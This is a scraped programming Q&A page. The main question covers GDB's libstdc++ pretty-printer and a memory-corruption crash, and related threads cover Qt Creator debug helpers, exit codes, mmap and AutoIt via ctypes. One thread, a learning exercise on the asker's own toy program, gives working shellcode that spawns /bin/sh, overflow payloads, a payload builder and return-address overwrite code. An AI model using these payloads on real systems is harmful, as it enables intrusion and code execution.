How do I apply the printers.py modification? (Linux OS) - python

I checked the core file because a process (written in C++) running on Linux died, and this is what the core file showed:
[Corefile]
File "/usr/lib64/../share/gdb/python/libstdcxx/v6/printers.py", line 558, in to_string
return self.val['_M_dataplus']['_M_p'].lazy_string (length = len)
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
I think there is a problem with the StdStringPrinter class in printers.py.
So I looked up posts on this site that explain the problem, modified printers.py, and created a .gdbinit in my home directory with the content below.
How to enable gdb pretty printing for C++ STL objects in Eclipse CDT?
Eclipse/CDT Pretty Print Errors
But those methods are a little different from what I am looking for, because they are done in Eclipse.
My GDB version is 7.6.1-94.el7.
[printers.py]
class StdStringPrinter:
    "Print a std::basic_string of some kind"

    def __init__(self, typename, val):
        self.val = val

    def to_string(self):
        # Make sure &string works, too.
        type = self.val.type
        if type.code == gdb.TYPE_CODE_REF:
            type = type.target ()

        sys.stdout.write("HelloWorld")  # TEST Code

        # Calculate the length of the string so that to_string returns
        # the string according to length, not according to first null
        # encountered.
        ptr = self.val ['_M_dataplus']['_M_p']
        realtype = type.unqualified ().strip_typedefs ()
        reptype = gdb.lookup_type (str (realtype) + '::_Rep').pointer ()
        header = ptr.cast(reptype) - 1
        len = header.dereference ()['_M_length']
        if hasattr(ptr, "lazy_string"):
            return ptr.lazy_string (length = len)
        return ptr.string (length = len)

    def display_hint (self):
        return 'string'
[.gdbinit]
python
import sys
sys.path.insert(0, '/home/Hello/gcc-4.8.2/python')
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (None)
end
My question is: after modifying printers.py and writing .gdbinit, do I have to re-compile the process to test whether the modification has been applied?
How can I see the output of my modified TEST code in the Linux terminal?

I think there is a problem with the StdStringPrinter class in printers.py
I think you are fundamentally confused, and your problem has nothing at all to do with printers.py.
You didn't show us your GDB session, but it appears that you have tried to print some variable of type std::string, and when you did so, GDB produced this error:
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
What this error means is that GDB could not read a value from memory location 0x3b444e45203b290f. On an x86_64 system, such an address indeed cannot be readable, because it is not in canonical form.
Conclusion: the pointer that you followed (likely a pointer to a std::string in your program) does not actually point to a std::string. "Fixing" printers.py is not going to solve that problem.
This conclusion is corroborated by
the process(c++ lang) running on Linux died,
Finally, the pointer that you gave GDB to print, 0x3b444e45203b290f, looks suspiciously like an ASCII string. Decoded as the little-endian bytes it occupies in memory, it reads: \x0f); END;. So it is very likely that your program scribbled "); END;" over the location where the pointer was supposed to be, and that you have a buffer overflow of some sort.
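A quick way to see this for yourself is to unpack the faulting address as the little-endian bytes it would occupy in memory (a minimal Python 3 sketch, independent of GDB):
# Sketch: decode the faulting address into the ASCII bytes it holds in memory.
addr = 0x3b444e45203b290f
raw = addr.to_bytes(8, byteorder="little")
print(raw)  # b'\x0f); END;'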
P.S.
My question is: after modifying printers.py and writing .gdbinit, do I have to re-compile the process to test whether the modification has been applied?
This question also shows fundamental misunderstanding of how printers.py works. It has nothing to do with your program (it's loaded into GDB).
Recompiling anything (either your program or GDB) is not required. Simply restarting GDB should be all that is necessary for it to pick up the new version of printers.py (not that that would fix anything).
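To see test output like the "HelloWorld" line, keep in mind that printers.py runs inside GDB's embedded Python interpreter, so anything it prints appears in the GDB session, not in the program's own terminal. As a minimal sketch (the file name hello_printer.py is just an illustrative assumption), you can confirm that GDB is picking up your Python code by sourcing a file that writes a message:
# hello_printer.py -- load it from a GDB session with: source hello_printer.py
# The message is printed by GDB itself; the debugged process is untouched,
# so no recompilation of the process is needed.
import gdb
gdb.write("HelloWorld: this Python file was loaded by GDB\n")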

Related

How to write a custom debugging helper for nlohmann::basic_json?

I am faced with the task of writing a simple debug helper for Qt Creator 4.13.1 / Qt 5.12.5 / MSVC 2017 compiler for the C++ JSON implementation nlohmann::basic_json (https://github.com/nlohmann/json).
An object of nlohmann::basic_json can contain the contents of a single JSON data type (null, boolean, number, string, array, object) at a time.
There's a dump() member function which can be used to output the current content formatted as a std::string regardless of the current data type. I always want to use this function.
What I've done so far:
I've looked at https://doc.qt.io/qtcreator/creator-debugging-helpers.html, as well as at the given example files (qttypes.py, stdtypes.py...).
I made a copy of the file personaltypes.py and told Qt Creator about its existence at
Tools / Options / Debugger / Locals & Expressions / Extra Debugging Helpers
The following code works and displays a "Hello World" in the debugger window for nlohmann::basic_json objects.
import dumper

def qdump__nlohmann__basic_json(d, value):
    d.putNumChild(0)
    d.putValue("Hello World")
Unfortunately, despite the documentation, I have no idea how to proceed from here on.
I still have absolutely no clue how to correctly call basic_json's dump() function with the dumper from Python (e.g. with d.putCallItem ?).
I also have no starting point how to format the returned std::string so that it is finally displayed in the debugger window.
I imagined something like this, but it doesn't work.
d.putValue("data")
d.putNumChild(1)
d.putCallItem('dump', '#std::string', value, 'dump')
I hope someone can give me a little clue so that I can continue thinking in the right direction.
For example, can I call qdump__std__string from stdtypes.py myself to interpret the std::string?

Get Python to read a return code from C# in a reliable fashion

I've written a large-ish program in Python, which I need to talk to a smaller C# script. (I realise that getting Python and C# to talk to each other is not an ideal state of affairs, but I'm forced to do this by a piece of hardware, which demands a C# script.) What I want to achieve in particular - the motivation behind this question - is that I want to know when a specific caught exception occurs in the C# script.
I've been trying to achieve the above by getting my Python program to look at the C# script's return code. The problem I've been having is that, if I tell C# to give a return code x, my OS will receive a return code y and Python will receive a return code z. While a given x always seems to correspond to a specific y and a specific z, I'm having difficulty deciphering the relationship between the three; they should be the same.
Here are the specifics of my setup:
My version of Python is Python 3.
My OS is Ubuntu 20.04.
I'm using Mono to compile and run my C# script.
And here's a minimal working example of the sort of thing I'm talking about:
This is a tiny C# script:
namespace ConsoleApplication1
{
    class Script
    {
        const int ramanujansNumber = 1729;

        bool Run()
        {
            return false;
        }

        static int Main(string[] args)
        {
            Script program = new Script();
            if (program.Run()) return 0;
            else return ramanujansNumber;
        }
    }
}
If I compile this using mcs Script.cs, run it using mono Script.exe and then run echo $?, it prints 193. If, on the other hand, I run this Python script:
import os
result = os.system("mono Script.exe")
print(result)
it prints 49408. What is the relationship between these three numbers: 1729, 193, 49408? Can I predict the return code that Python will receive if I know what the C# script will return?
Note: I've tried using Environment.Exit(code) in the C# script instead of having Main return an integer. I ran into exactly the same problem.
For os.system, the documentation explicitly states that the result is in the same format as for os.wait(), i.e.:
a 16-bit number, whose low byte is the signal number that killed the process, and whose high byte is the exit status (if the signal number is zero); the high bit of the low byte is set if a core file was produced.
So in your case it looks like:
>>> 193<<8
49408
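The same status word can be unpacked with the helpers in the os module (a small sketch; 49408 is the value from the question, and os.WEXITSTATUS is POSIX-only):
import os
status = 49408                  # what os.system() returned
print(status >> 8)              # 193: the exit-status byte
print(os.WEXITSTATUS(status))   # the same value via the standard helper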
You might want to change that part to using subprocess, e.g. as in the answer to this question
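For completeness, a minimal subprocess-based sketch (assuming mono and Script.exe are reachable from the working directory), which reports the exit status directly instead of the packed wait-style word:
import subprocess
result = subprocess.run(["mono", "Script.exe"])
print(result.returncode)        # 193, i.e. 1729 & 255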
UPD: As for the mono return code, it looks like only the lower byte of it is used (i.e. it is expected to be between 0 and 255). At least:
>>> 1729 & 255
193

Why is my stack buffer overflow exploit not working?

So I have a really simple stack buffer overflow:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance, if I point EIP at NOPs, the NOPs never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why the address at the end gets changed in GDB.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten EIP is changed by GDB. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb, and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections against this kind of attack that come straight from the
compiler. For example, your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack (so you should "return to libc" to spawn your shell).
Also, there could be canary protection, meaning that between your variables and the saved instruction pointer there is a value that is checked for integrity; if it has been overwritten by your string, the program will exit.
If you are trying this on your own program, consider removing some of the protections with gcc flags:
gcc -z execstack
Also, a note on your payload: you usually include NOPs before your shellcode, so you don't have to target the exact address where your shellcode starts.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that gets placed into the instruction pointer, you can modify the last hex digits to point somewhere inside your NOPs, not necessarily at the beginning of your buffer.
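The python -c one-liners above assume Python 2, where print writes raw bytes. A roughly equivalent stand-alone Python 3 sketch for building such a payload (the return address 0xbffff4c8 is just the value used in this question and has to be adjusted to your own stack) could look like this:
# Payload-builder sketch: NOP sled + shellcode + padding + little-endian return address.
import struct
import sys

shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
payload = b"\x90" * 37 + shellcode + b"A" * 200 + struct.pack("<I", 0xbffff4c8)
sys.stdout.buffer.write(payload)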
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for each environment variable) and "pushes" these strings onto the stack in a downward direction [towards lower memory]. It then calculates how many there are (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to the given strings. It null-terminates this envp.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must use RIP-relative addressing and [probably] be built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
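Regarding the zero-byte constraint above, a quick sanity check on the shellcode used in this question (a Python sketch, separate from the exploit itself):
# The kernel passes argv strings as NUL-terminated C strings, so any 0x00 byte
# would truncate the payload at that point.
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
assert b"\x00" not in shellcode
print(len(shellcode), "bytes, no NUL bytes")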
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf; *cp != 0; ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write, 1, buf, cp - buf);
    syscall(SYS_exit, 0);
}

int
main(int argc, char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n", retadr);
    printf("fp=%p\n", fp);

    // NOTE: for your example, replace:
    //     *fp = (void *) shellcode;
    // with:
    //     *fp = (void *) argv[1]

    for (iter = 20; iter > 0; --iter, fp += 1) {
        printf("fp=%p %p\n", fp, *fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void)
{
    __asm__("movl %esp,%eax");
}
And called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.
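In the same spirit, a small Python sketch for generating little-endian candidate return addresses around an observed stack value (0xbffff5cc is simply the address that appeared in the GDB output earlier in this question):
# Print candidate addresses at 4-byte steps below the observed ESP value.
import struct

esp = 0xbffff5cc
for delta in range(0, 33, 4):
    candidate = esp - delta
    print(hex(candidate), struct.pack("<I", candidate))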

Python, why does mmap.move() fill up the memory?

edit: Using Win10 and python 3.5
I have a function that uses mmap to remove bytes from a file at a certain offset:
def delete_bytes(fobj, offset, size):
    fobj.seek(0, 2)
    filesize = fobj.tell()
    move_size = filesize - offset - size
    fobj.flush()
    file_map = mmap.mmap(fobj.fileno(), filesize)
    file_map.move(offset, offset + size, move_size)
    file_map.close()
    fobj.truncate(filesize - size)
    fobj.flush()
It works super fast, but when I run it on a large number of files, the memory quickly fills up and my system becomes unresponsive.
After some experimenting, I found that the move() method was the culprit here, and in particular the amount of data being moved (move_size).
The amount of memory being used is equivalent to the total amount of data being moved by mmap.move().
If I have 100 files with each ~30 MB moved, the memory gets filled with ~3GB.
Why isn't the moved data released from memory?
Things I tried that had no effect:
calling gc.collect() at the end of the function.
rewriting the function to move in small chunks.
This seems like it should work. I did find one suspicious bit in the mmapmodule.c source code, #ifdef MS_WINDOWS. Specifically, after all the setup to parse arguments, the code then does this:
if (fileno != -1 && fileno != 0) {
    /* Ensure that fileno is within the CRT's valid range */
    if (_PyVerify_fd(fileno) == 0) {
        PyErr_SetFromErrno(PyExc_OSError);
        return NULL;
    }
    fh = (HANDLE)_get_osfhandle(fileno);
    if (fh==(HANDLE)-1) {
        PyErr_SetFromErrno(PyExc_OSError);
        return NULL;
    }
    /* Win9x appears to need us seeked to zero */
    lseek(fileno, 0, SEEK_SET);
}
which moves your underlying file object's offset from "end of file" to "start of file" and then leaves it there. That seems like it should not break anything, but it might be worth doing your own seek-to-start-of-file just before calling mmap.mmap to map the file.
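For concreteness, here is a hedged variant of the question's function with that extra seek added (plus an explicit flush of the mapping before closing it). Whether this actually changes the memory behaviour on Windows 10 is an assumption to test, not a verified fix:
import mmap

def delete_bytes_v2(fobj, offset, size):
    fobj.seek(0, 2)
    filesize = fobj.tell()
    move_size = filesize - offset - size
    fobj.flush()
    fobj.seek(0)          # explicit seek back to the start, as suggested above
    file_map = mmap.mmap(fobj.fileno(), filesize)
    file_map.move(offset, offset + size, move_size)
    file_map.flush()      # write dirty pages back before unmapping
    file_map.close()
    fobj.truncate(filesize - size)
    fobj.flush()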
(Everything below is wrong, but left in since there are comments on it.)
In general, after using mmap(), you must use munmap() to undo the mapping. Simply closing the file descriptor has no effect. The Linux documentation calls this out explicitly:
munmap()
The munmap() system call deletes the mappings for the specified address range, and causes further references to addresses within the range to generate invalid memory references. The region is also automatically unmapped when the process is terminated. On the other hand, closing the file descriptor does not unmap the region.
(The BSD documentation is similar. Windows may behave differently from Unix-like systems here, but what you are seeing suggests that they work the same way.)
Unfortunately, Python's mmap module does not bind the munmap system call (nor mprotect), at least as of both 2.7.11 and 3.4.4. As a workaround you can use the ctypes module. See this question for an example (it calls reboot but the same technique works for all C library functions). Or, for a somewhat nicer method, you can write wrappers in cython.

Call functions in AutoIt DLL using Python ctypes

I want to call functions from an AutoIt DLL that I found at C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll, using Python. I know I could use win32com.client.Dispatch("AutoItX3.Control"), but I can't install the application or register anything on the system.
So far, this is where I am:
from ctypes import *
path = r"C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll"
autoit = windll.LoadLibrary(path)
Here are the methods that work:
autoit.AU3_WinMinimizeAll() # windows were successfully minimized.
autoit.AU3_Sleep(1000) # sleeps 1 sec.
Here is my problem: Python crashes when I call other methods, like this one. I get "python.exe has stopped working" from Windows...
autoit.AU3_WinGetHandle('Untitled - Notepad', '')
And some other methods are not crashing Python but are just not working. This one doesn't close the window and returns 0:
autoit.AU3_WinClose('Untitled - Notepad', '')
And this other one returns 1, but the window is still minimized:
autoit.AU3_WinActivate('Untitled - Notepad', '')
I've tested the examples with Dispatch("AutoItX3.Control") and everything works as expected.
It seems like methods that should return something other than a string are crashing python. But still, others like WinClose are not even working...
Thank you in advance for your help!
EDIT:
These methods are now working when using unicode strings:
autoit.AU3_WinClose(u'Untitled - Notepad', u'')
autoit.AU3_WinActivate(u'Untitled - Notepad', u'')
And I found the prototype for AU3_WinGetHandle:
AU3_API void WINAPI AU3_WinGetHandle(const char *szTitle,
    /*[in,defaultvalue("")]*/ const char *szText, char *szRetText, int nBufSize);
Now I can retrieve the return value using the following code!
from ctypes.wintypes import LPCWSTR
s = LPCWSTR(u'')
print autoit.AU3_WinGetHandle(u'Untitled - Notepad', u'', s, 100) # prints 1
print s.value # prints '000705E0'!
Thank you to those who helped me!
If you have the prototypes of the functions you're trying to call, then we can help you debug the calls without guessing. Or, more importantly, we won't have to help you debug the calls, because you can let ctypes do it for you.
See Specifying the required argument types in the docs.
For example, let's say the function looks like this (just a random guess!):
void AU3_WinClose(LPCWSTR name, LPCWSTR someotherthing);
You can do this:
autoit.AU3_WinClose.argtypes = (LPCWSTR, LPCWSTR)
autoit.AU3_WinClose.restype = None
If you do this, ctypes will try to convert your arguments to the specified types (LPCWSTR, which is a pointer to a wide-char string used for Windows UTF-16 strings) if it can, or raise an exception if it can't, and will not expect any return value.
If you don't do this, ctypes will try to guess the right types to convert your arguments to, possibly guessing wrong, and will try to interpret the non-existent return value as an int. So, it will usually crash until you manage to guess exactly what types to throw at it to make it guess the right types to pass to the function.
Will it work with unicode strings?
autoit.AU3_WinClose(u'Untitled - Notepad', u'')
autoit.AU3_WinActivate(u'Untitled - Notepad', u'')
Actually you might have to explicitly create unicode buffers, e.g.:
autoit.AU3_WinClose(create_unicode_buffer('Untitled - Notepad'), create_unicode_buffer(''))
Via some Googling, it looks like AU3_WinGetHandle takes 4 arguments, not 2. So you need to get that sorted out.
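Tying the pieces of this answer together, here is a hedged sketch of what a fully declared call to AU3_WinGetHandle might look like; the wide-string argument types and the lack of a return value are assumptions based on the observations and the prototype quoted in the question, not on AutoIt documentation:
from ctypes import windll, create_unicode_buffer
from ctypes.wintypes import LPCWSTR, LPWSTR, INT

autoit = windll.LoadLibrary(r"C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll")

# Assumed signature: title, text, output buffer, buffer size.
autoit.AU3_WinGetHandle.argtypes = (LPCWSTR, LPCWSTR, LPWSTR, INT)
autoit.AU3_WinGetHandle.restype = None

buf = create_unicode_buffer(100)      # writable buffer for the handle string
autoit.AU3_WinGetHandle(u'Untitled - Notepad', u'', buf, 100)
print(buf.value)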
